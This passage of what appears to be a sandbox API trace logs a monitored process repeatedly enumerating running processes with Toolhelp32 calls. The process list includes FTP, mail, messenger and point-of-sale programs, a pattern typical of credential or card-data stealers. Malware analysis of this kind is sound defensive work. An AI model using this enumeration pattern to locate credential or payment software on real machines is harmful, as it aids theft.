th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.250] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0244.252] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0244.254] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0244.257] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0244.259] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0244.261] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0244.263] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.265] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.268] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0244.270] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.274] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.276] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.279] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.281] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.283] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0244.285] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0244.331] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0244.333] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0244.335] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0244.337] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0244.340] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0244.342] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0244.344] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0244.346] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0244.348] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0244.350] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0244.353] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0244.355] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0244.357] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0244.359] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0244.361] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0244.364] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0244.403] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0244.405] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0244.408] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0244.410] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0244.413] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0244.416] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0244.418] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0244.421] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0244.424] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0244.426] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0244.429] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0244.432] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0244.434] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0244.440] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0244.443] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0244.446] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0244.448] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0244.451] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0244.453] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0244.456] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0244.458] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0244.461] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0244.463] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0244.466] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0244.468] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0244.471] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0244.473] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0244.480] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0244.482] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0244.485] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0244.488] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0244.490] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0244.492] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0244.496] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0244.499] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0244.501] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0244.504] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0244.506] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0244.509] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0244.511] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0244.513] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0244.519] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0244.521] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0244.523] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.525] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0244.527] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.530] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.533] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0244.535] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.537] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0244.538] CloseHandle (hObject=0x18d8) returned 1 [0244.538] Sleep (dwMilliseconds=0x64) [0244.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x230c [0244.672] Process32First (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.674] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: 